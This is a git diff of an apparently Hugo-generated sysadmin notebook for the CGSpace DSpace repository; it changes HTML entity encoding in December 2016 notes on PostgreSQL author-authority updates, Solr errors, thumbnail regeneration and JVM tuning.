<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, 'http://ccafs.cgiar.org','https://ccafs.cgiar.org') where resource_type_id=2 and text_value like '%http://ccafs.cgiar.org%';
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://ccafs.cgiar.org&#39;,&#39;https://ccafs.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://ccafs.cgiar.org%&#39;;
UPDATE 164
dspace=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://ccafs.cgiar.org&#39;,&#39;https://ccafs.cgiar.org&#39;) where resource_type_id=2 and text_value like &#39;%http://ccafs.cgiar.org%&#39;;
UPDATE 7
</code></pre><ul>
<li>Had to run it twice to get them all, most likely because PostgreSQL&rsquo;s <code>regexp_replace()</code> only replaces the first match in each value unless you pass the <code>&#39;g&#39;</code> flag as the fourth argument, as in the sketch below</li>
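</ul>
<pre tabindex="0"><code>dspacetest=# update metadatavalue set text_value = regexp_replace(text_value, &#39;http://ccafs.cgiar.org&#39;, &#39;https://ccafs.cgiar.org&#39;, &#39;g&#39;) where resource_type_id=2 and text_value like &#39;%http://ccafs.cgiar.org%&#39;;
</code></pre>
<ul>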
@ -404,11 +404,11 @@ UPDATE 7
<li>I&rsquo;m debating forcing the re-generation of ALL thumbnails, since some come from DSpace 3 and 4 when the thumbnailing wasn&rsquo;t as good</li>
<li>The results were very good; I think that after we upgrade to 5.5 I will do it, perhaps one community or collection at a time:</li>
</ul>
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p &quot;ImageMagick PDF Thumbnail&quot;
<pre tabindex="0"><code>$ [dspace]/bin/dspace filter-media -f -i 10568/67156 -p &#34;ImageMagick PDF Thumbnail&#34;
</code></pre><ul>
<li>In related news, I&rsquo;m looking at thumbnails of thumbnails (the ones we uploaded manually before, and now DSpace&rsquo;s media filter has made thumbnails of THEM):</li>
</ul>
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where text_value like '%.jpg.jpg';
<pre tabindex="0"><code>dspace=# select text_value from metadatavalue where text_value like &#39;%.jpg.jpg&#39;;
</code></pre><ul>
<li>I&rsquo;m not sure if there&rsquo;s anything we can do, actually, because we would have to remove those from the thumbnail bundles, and replace them with the regular JPGs from the content bundle, and then remove them from the assetstore&hellip;</li>
</ul>
@ -464,7 +464,7 @@ UPDATE 7
<li>One user says he is still getting a blank page when he logs in (just the CGSpace header, but no community list)</li>
<li>Looking at the Catalina logs, I see there is some super long-running indexing process going on:</li>
</ul>
<pre tabindex="0"><code>INFO: FrameworkServlet 'oai': initialization completed in 2600 ms
<pre tabindex="0"><code>INFO: FrameworkServlet &#39;oai&#39;: initialization completed in 2600 ms
[&gt; ] 0% time remaining: Calculating... timestamp: 2016-11-28 03:00:18
[&gt; ] 0% time remaining: 11 hour(s) 57 minute(s) 46 seconds. timestamp: 2016-11-28 03:00:19
[&gt; ] 0% time remaining: 23 hour(s) 4 minute(s) 28 seconds. timestamp: 2016-11-28 03:00:19
@ -497,7 +497,7 @@ $ /home/dspacetest.cgiar.org/bin/dspace registry-loader -metadata /home/dspacete
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Start processing item 10568/50391 id:51744
2016-11-29 07:56:36,545 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item stats
2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
2016-11-29 07:56:36,583 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Processing item&#39;s bitstream stats
2016-11-29 07:56:36,608 INFO com.atmire.utils.UpdateSolrStatsMetadata @ Solr metadata up-to-date
2016-11-29 07:56:36,701 INFO org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ facets for scope, null: 23
2016-11-29 07:56:36,747 ERROR org.dspace.app.xmlui.aspect.discovery.SidebarFacetsTransformer @ Error while searching for sidebar facets

View File

@ -12,11 +12,11 @@
CGSpace was down for five hours in the morning while I was sleeping
While looking in the logs for errors, I see tons of warnings about Atmire MQM:
2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade
I&rsquo;ve raised a ticket with Atmire to ask
@ -36,17 +36,17 @@ Another worrying error from dspace.log is:
Another worrying error from dspace.log is:
"/>
<meta name="generator" content="Hugo 0.92.2" />
<meta name="generator" content="Hugo 0.93.1" />
@ -137,11 +137,11 @@ Another worrying error from dspace.log is:
<li>CGSpace was down for five hours in the morning while I was sleeping</li>
<li>While looking in the logs for errors, I see tons of warnings about Atmire MQM:</li>
</ul>
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&quot;dc.title&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&quot;THUMBNAIL&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&quot;-1&quot;, transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&quot;TX157907838689377964651674089851855413607&quot;)
<pre tabindex="0"><code>2016-12-02 03:00:32,352 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=CREATE, SubjectType=BUNDLE, SubjectID=70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632305, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY_METADATA, SubjectType=BUNDLE, SubjectID =70316, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632309, dispatcher=1544803905, detail=&#34;dc.title&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=ITEM, SubjectID=80044, Object Type=BUNDLE, ObjectID=70316, TimeStamp=1480647632311, dispatcher=1544803905, detail=&#34;THUMBNAIL&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=ADD, SubjectType=BUNDLE, SubjectID=70316, Obje ctType=BITSTREAM, ObjectID=86715, TimeStamp=1480647632318, dispatcher=1544803905, detail=&#34;-1&#34;, transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
2016-12-02 03:00:32,353 WARN com.atmire.metadataquality.batchedit.BatchEditConsumer @ BatchEditConsumer should not have been given this kind of Subject in an event, skipping: org.dspace.event.Event(eventType=MODIFY, SubjectType=ITEM, SubjectID=80044, ObjectType=(Unknown), ObjectID=-1, TimeStamp=1480647632351, dispatcher=1544803905, detail=[null], transactionID=&#34;TX157907838689377964651674089851855413607&#34;)
</code></pre><ul>
<li>I see thousands of them in the logs for the last few months, so it&rsquo;s not related to the DSpace 5.5 upgrade</li>
<li>I&rsquo;ve raised a ticket with Atmire to ask</li>
@ -236,13 +236,13 @@ Caused by: java.lang.NoSuchMethodError: com.atmire.statistics.generator.DSpaceOb
</code></pre><ul>
<li>The first error I see in dspace.log this morning is:</li>
</ul>
<pre tabindex="0"><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&quot;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&quot;
<pre tabindex="0"><code>2016-12-02 03:00:46,656 ERROR org.dspace.authority.AuthorityValueFinder @ anonymous::Error while retrieving AuthorityValue from solr:query\colon; id\colon;&#34;b0b541c1-ec15-48bf-9209-6dbe8e338cdc&#34;
org.apache.solr.client.solrj.SolrServerException: Server refused connection at: http://localhost:8081/solr/authority
</code></pre><ul>
<li>Looking through DSpace&rsquo;s solr log I see that about 20 seconds before this, there were a few 30+ KiB solr queries</li>
<li>The last logs here right before Solr became unresponsive (and right after I restarted it five hours later) were:</li>
</ul>
<pre tabindex="0"><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&quot;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&quot;++AND+subject_mtdt:&quot;PARTNERSHIPS&quot;+AND+subject_mtdt:&quot;RESEARCH&quot;+AND+subject_mtdt:&quot;AGRICULTURE&quot;+AND+subject_mtdt:&quot;DEVELOPMENT&quot;++AND+iso_mtdt:&quot;en&quot;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
<pre tabindex="0"><code>2016-12-02 03:00:42,606 INFO org.apache.solr.core.SolrCore @ [statistics] webapp=/solr path=/select params={q=containerItem:72828+AND+type:0&amp;shards=localhost:8081/solr/statistics-2010,localhost:8081/solr/statistics&amp;fq=-isInternal:true&amp;fq=-(author_mtdt:&#34;CGIAR\+Institutional\+Learning\+and\+Change\+Initiative&#34;++AND+subject_mtdt:&#34;PARTNERSHIPS&#34;+AND+subject_mtdt:&#34;RESEARCH&#34;+AND+subject_mtdt:&#34;AGRICULTURE&#34;+AND+subject_mtdt:&#34;DEVELOPMENT&#34;++AND+iso_mtdt:&#34;en&#34;+)&amp;rows=0&amp;wt=javabin&amp;version=2} hits=0 status=0 QTime=19
2016-12-02 08:28:23,908 INFO org.apache.solr.servlet.SolrDispatchFilter @ SolrDispatchFilter.init()
</code></pre><ul>
<li>DSpace&rsquo;s own Solr logs don&rsquo;t give IP addresses, so I will have to enable Nginx&rsquo;s logging of <code>/solr</code> so I can see where this request came from</li>
@ -279,7 +279,7 @@ Result = The bitstream could not be found
<li>In other news, I&rsquo;m looking at JVM settings from the Solr 4.10.2 release, from <code>bin/solr.in.sh</code>:</li>
</ul>
<pre tabindex="0"><code># These GC settings have shown to work well for a number of common Solr workloads
GC_TUNE=&quot;-XX:-UseSuperWord \
GC_TUNE=&#34;-XX:-UseSuperWord \
-XX:NewRatio=3 \
-XX:SurvivorRatio=4 \
-XX:TargetSurvivorRatio=90 \
@ -296,7 +296,7 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
-XX:CMSMaxAbortablePrecleanTime=6000 \
-XX:+CMSParallelRemarkEnabled \
-XX:+ParallelRefProcEnabled \
-XX:+AggressiveOpts&quot;
-XX:+AggressiveOpts&#34;
</code></pre><ul>
<li>I need to try these because they are recommended by the Solr project itself</li>
<li>Also, as always, I need to read <a href="https://wiki.apache.org/solr/ShawnHeisey">Shawn Heisey&rsquo;s wiki page on Solr</a></li>
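<li>If we adopt them, the flags would get appended to Tomcat&rsquo;s <code>JAVA_OPTS</code>, something like this sketch (file location assumed):</li>
</ul>
<pre tabindex="0"><code># in /etc/default/tomcat7, or wherever JAVA_OPTS is set for Tomcat
JAVA_OPTS=&#34;$JAVA_OPTS -XX:NewRatio=3 -XX:SurvivorRatio=4 -XX:+UseConcMarkSweepGC -XX:+UseParNewGC&#34;
</code></pre>
<ul>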
@ -319,17 +319,17 @@ GC_TUNE=&quot;-XX:-UseSuperWord \
<ul>
<li>Some author authority corrections and name standardizations for Peter:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
UPDATE 11
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
UPDATE 36
dspace=# update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
UPDATE 14
dspace=# update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
UPDATE 42
dspace=# update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
UPDATE 360
dspace=# update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Pay attention to the regex to prevent false positives in tricky cases with Dutch names! (the <code>!~ &#39;^.*W\.?$&#39;</code> clause keeps name variants ending in &ldquo;W&rdquo; or &ldquo;W.&rdquo; from being rewritten)</li>
@ -343,7 +343,7 @@ UPDATE 561
<li>The docs say a good starting point for a dedicated server is 25% of the system RAM, but our server isn&rsquo;t dedicated (it also runs Solr, which can benefit from the OS cache), so let&rsquo;s try 1024MB, as sketched below</li>
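</ul>
<pre tabindex="0"><code># a sketch, in postgresql.conf:
shared_buffers = 1024MB
</code></pre>
<ul>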
<li>In other news, the authority reindexing keeps crashing (I was manually running it after the author updates above):</li>
</ul>
<pre tabindex="0"><code>$ time JAVA_OPTS=&quot;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&quot; /home/dspacetest.cgiar.org/bin/dspace index-authority
<pre tabindex="0"><code>$ time JAVA_OPTS=&#34;-Xms768m -Xmx768m -Dfile.encoding=UTF-8&#34; /home/dspacetest.cgiar.org/bin/dspace index-authority
Retrieving all data
Initialize org.dspace.authority.indexer.DSpaceAuthorityIndexer
Exception: null
@ -377,30 +377,30 @@ sys 0m22.647s
<li>Querying that ID shows the fields that need to be changed:</li>
</ul>
<pre tabindex="0"><code>{
&quot;responseHeader&quot;: {
&quot;status&quot;: 0,
&quot;QTime&quot;: 1,
&quot;params&quot;: {
&quot;q&quot;: &quot;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;indent&quot;: &quot;true&quot;,
&quot;wt&quot;: &quot;json&quot;,
&quot;_&quot;: &quot;1481102189244&quot;
&#34;responseHeader&#34;: {
&#34;status&#34;: 0,
&#34;QTime&#34;: 1,
&#34;params&#34;: {
&#34;q&#34;: &#34;id:0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;indent&#34;: &#34;true&#34;,
&#34;wt&#34;: &#34;json&#34;,
&#34;_&#34;: &#34;1481102189244&#34;
}
},
&quot;response&quot;: {
&quot;numFound&quot;: 1,
&quot;start&quot;: 0,
&quot;docs&quot;: [
&#34;response&#34;: {
&#34;numFound&#34;: 1,
&#34;start&#34;: 0,
&#34;docs&#34;: [
{
&quot;id&quot;: &quot;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&quot;,
&quot;field&quot;: &quot;dc_contributor_author&quot;,
&quot;value&quot;: &quot;Grace, D.&quot;,
&quot;deleted&quot;: false,
&quot;creation_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;last_modified_date&quot;: &quot;2016-11-10T15:13:40.318Z&quot;,
&quot;authority_type&quot;: &quot;person&quot;,
&quot;first_name&quot;: &quot;D.&quot;,
&quot;last_name&quot;: &quot;Grace&quot;
&#34;id&#34;: &#34;0b4fcbc1-d930-4319-9b4d-ea1553cca70b&#34;,
&#34;field&#34;: &#34;dc_contributor_author&#34;,
&#34;value&#34;: &#34;Grace, D.&#34;,
&#34;deleted&#34;: false,
&#34;creation_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;last_modified_date&#34;: &#34;2016-11-10T15:13:40.318Z&#34;,
&#34;authority_type&#34;: &#34;person&#34;,
&#34;first_name&#34;: &#34;D.&#34;,
&#34;last_name&#34;: &#34;Grace&#34;
}
]
}
@ -409,51 +409,51 @@ sys 0m22.647s
<li>I think I can just update the <code>value</code>, <code>first_name</code>, and <code>last_name</code> fields&hellip;</li>
<li>The update syntax should be something like this, but I&rsquo;m getting errors from Solr:</li>
</ul>
<pre tabindex="0"><code>$ curl 'localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true' -H 'Content-type:application/json' -d '[{&quot;id&quot;:&quot;1&quot;,&quot;price&quot;:{&quot;set&quot;:100}}]'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/update?commit=true&amp;wt=json&amp;indent=true&#39; -H &#39;Content-type:application/json&#39; -d &#39;[{&#34;id&#34;:&#34;1&#34;,&#34;price&#34;:{&#34;set&#34;:100}}]&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:400,
&quot;QTime&quot;:0},
&quot;error&quot;:{
&quot;msg&quot;:&quot;Unexpected character '[' (code 91) in prolog; expected '&lt;'\n at [row,col {unknown-source}]: [1,1]&quot;,
&quot;code&quot;:400}}
&#34;responseHeader&#34;:{
&#34;status&#34;:400,
&#34;QTime&#34;:0},
&#34;error&#34;:{
&#34;msg&#34;:&#34;Unexpected character &#39;[&#39; (code 91) in prolog; expected &#39;&lt;&#39;\n at [row,col {unknown-source}]: [1,1]&#34;,
&#34;code&#34;:400}}
</code></pre><ul>
<li>When I try using the XML format I get an error that the <code>updateLog</code> needs to be configured for that core (Solr&rsquo;s atomic updates require <code>&lt;updateLog/&gt;</code> to be enabled in the core&rsquo;s solrconfig.xml, which DSpace doesn&rsquo;t do for the authority core)</li>
<li>Maybe I can just remove the authority UUID from the records, run the indexing again so it creates a new one for each name variant, then match them correctly?</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=null, confidence=-1 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
UPDATE 561
</code></pre><ul>
<li>Then I&rsquo;ll reindex discovery and authority and see how the authority Solr core looks</li>
<li>After this, there are authorities for some of the &ldquo;Grace, D.&rdquo; and &ldquo;Grace, Delia&rdquo; text_values in the database (the first version is actually the same authority that already exists in the core, so it was just added back to some text_values, but the second one is new)</li>
</ul>
<pre tabindex="0"><code>$ curl 'localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true'
<pre tabindex="0"><code>$ curl &#39;localhost:8081/solr/authority/select?q=id%3A18ea1525-2513-430a-8817-a834cd733fbc&amp;wt=json&amp;indent=true&#39;
{
&quot;responseHeader&quot;:{
&quot;status&quot;:0,
&quot;QTime&quot;:0,
&quot;params&quot;:{
&quot;q&quot;:&quot;id:18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;indent&quot;:&quot;true&quot;,
&quot;wt&quot;:&quot;json&quot;}},
&quot;response&quot;:{&quot;numFound&quot;:1,&quot;start&quot;:0,&quot;docs&quot;:[
&#34;responseHeader&#34;:{
&#34;status&#34;:0,
&#34;QTime&#34;:0,
&#34;params&#34;:{
&#34;q&#34;:&#34;id:18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;indent&#34;:&#34;true&#34;,
&#34;wt&#34;:&#34;json&#34;}},
&#34;response&#34;:{&#34;numFound&#34;:1,&#34;start&#34;:0,&#34;docs&#34;:[
{
&quot;id&quot;:&quot;18ea1525-2513-430a-8817-a834cd733fbc&quot;,
&quot;field&quot;:&quot;dc_contributor_author&quot;,
&quot;value&quot;:&quot;Grace, Delia&quot;,
&quot;deleted&quot;:false,
&quot;creation_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;last_modified_date&quot;:&quot;2016-12-07T10:54:34.356Z&quot;,
&quot;authority_type&quot;:&quot;person&quot;,
&quot;first_name&quot;:&quot;Delia&quot;,
&quot;last_name&quot;:&quot;Grace&quot;}]
&#34;id&#34;:&#34;18ea1525-2513-430a-8817-a834cd733fbc&#34;,
&#34;field&#34;:&#34;dc_contributor_author&#34;,
&#34;value&#34;:&#34;Grace, Delia&#34;,
&#34;deleted&#34;:false,
&#34;creation_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;last_modified_date&#34;:&#34;2016-12-07T10:54:34.356Z&#34;,
&#34;authority_type&#34;:&#34;person&#34;,
&#34;first_name&#34;:&#34;Delia&#34;,
&#34;last_name&#34;:&#34;Grace&#34;}]
}}
</code></pre><ul>
<li>So now I could set them all to this ID and the name would be ok, but there has to be a better way!</li>
<li>In this case it seems that since there were also two different IDs in the original database, I just picked the wrong one!</li>
<li>Better to use:</li>
</ul>
<pre tabindex="0"><code>dspace#= update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>dspace#= update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><ul>
<li>This proves that unifying author name varieties in authorities is easy, but fixing the name in the authority is tricky!</li>
<li>Perhaps another way is to just add our own UUID to the authority field for the text_value we like, then re-index authority so they get synced from PostgreSQL to Solr, then set the other text_values to use that authority ID</li>
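<li>That workflow would look something like this sketch (the UUID here is a placeholder; generate a real one with <code>uuidgen</code>):</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority=&#39;00000000-0000-0000-0000-000000000000&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value = &#39;Grace, Delia&#39;;
$ [dspace]/bin/dspace index-authority
</code></pre>
<ul>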
@ -461,17 +461,17 @@ UPDATE 561
<li>Deploy &ldquo;take task&rdquo; hack/fix on CGSpace (<a href="https://github.com/ilri/DSpace/pull/290">#290</a>)</li>
<li>I ran the following author corrections and then reindexed discovery:</li>
</ul>
<pre tabindex="0"><code>update metadatavalue set authority='b041f2f4-19e7-4113-b774-0439baabd197', confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like 'Mora Benard%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Hoek, R%';
update metadatavalue set text_value = 'Hoek, Rein van der', authority='4d6cbce2-6fd5-4b43-9363-58d18e7952c9', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like '%an der Hoek%' and text_value !~ '^.*W\.?$';
update metadatavalue set authority='18349f29-61b1-44d7-ac60-89e55546e812', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne, P%';
update metadatavalue set authority='0d8369bb-57f7-4b2f-92aa-af820b183aca', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thornton, P%';
update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-4175-991c-2e7315000f0c', confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like 'Grace, D%';
<pre tabindex="0"><code>update metadatavalue set authority=&#39;b041f2f4-19e7-4113-b774-0439baabd197&#39;, confidence=600 where metadata_field_id=3 and resource_type_id=2 and text_value like &#39;Mora Benard%&#39;;
update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Hoek, R%&#39;;
update metadatavalue set text_value = &#39;Hoek, Rein van der&#39;, authority=&#39;4d6cbce2-6fd5-4b43-9363-58d18e7952c9&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;%an der Hoek%&#39; and text_value !~ &#39;^.*W\.?$&#39;;
update metadatavalue set authority=&#39;18349f29-61b1-44d7-ac60-89e55546e812&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne, P%&#39;;
update metadatavalue set authority=&#39;0d8369bb-57f7-4b2f-92aa-af820b183aca&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thornton, P%&#39;;
update metadatavalue set text_value=&#39;Grace, Delia&#39;, authority=&#39;bfa61d7c-7583-4175-991c-2e7315000f0c&#39;, confidence=600 where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Grace, D%&#39;;
</code></pre><h2 id="2016-12-08">2016-12-08</h2>
<ul>
<li>Something weird happened and Peter Thorne&rsquo;s names all ended up as &ldquo;Thorne&rdquo;, I guess because the original authority had that as its name value:</li>
</ul>
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like 'Thorne%';
<pre tabindex="0"><code>dspace=# select distinct text_value, authority, confidence from metadatavalue where resource_type_id=2 and metadata_field_id=3 and text_value like &#39;Thorne%&#39;;
text_value | authority | confidence
------------------+--------------------------------------+------------
Thorne, P.J. | 18349f29-61b1-44d7-ac60-89e55546e812 | 600
@ -484,12 +484,12 @@ update metadatavalue set text_value='Grace, Delia', authority='bfa61d7c-7583-417
</code></pre><ul>
<li>I generated a new UUID using <code>uuidgen | tr [A-Z] [a-z]</code> and set it, along with the correct name variation, for all records:</li>
</ul>
<pre tabindex="0"><code>dspace=# update metadatavalue set authority='b2f7603d-2fb5-4018-923a-c4ec8d85b3bb', text_value='Thorne, P.J.' where resource_type_id=2 and metadata_field_id=3 and authority='18349f29-61b1-44d7-ac60-89e55546e812';
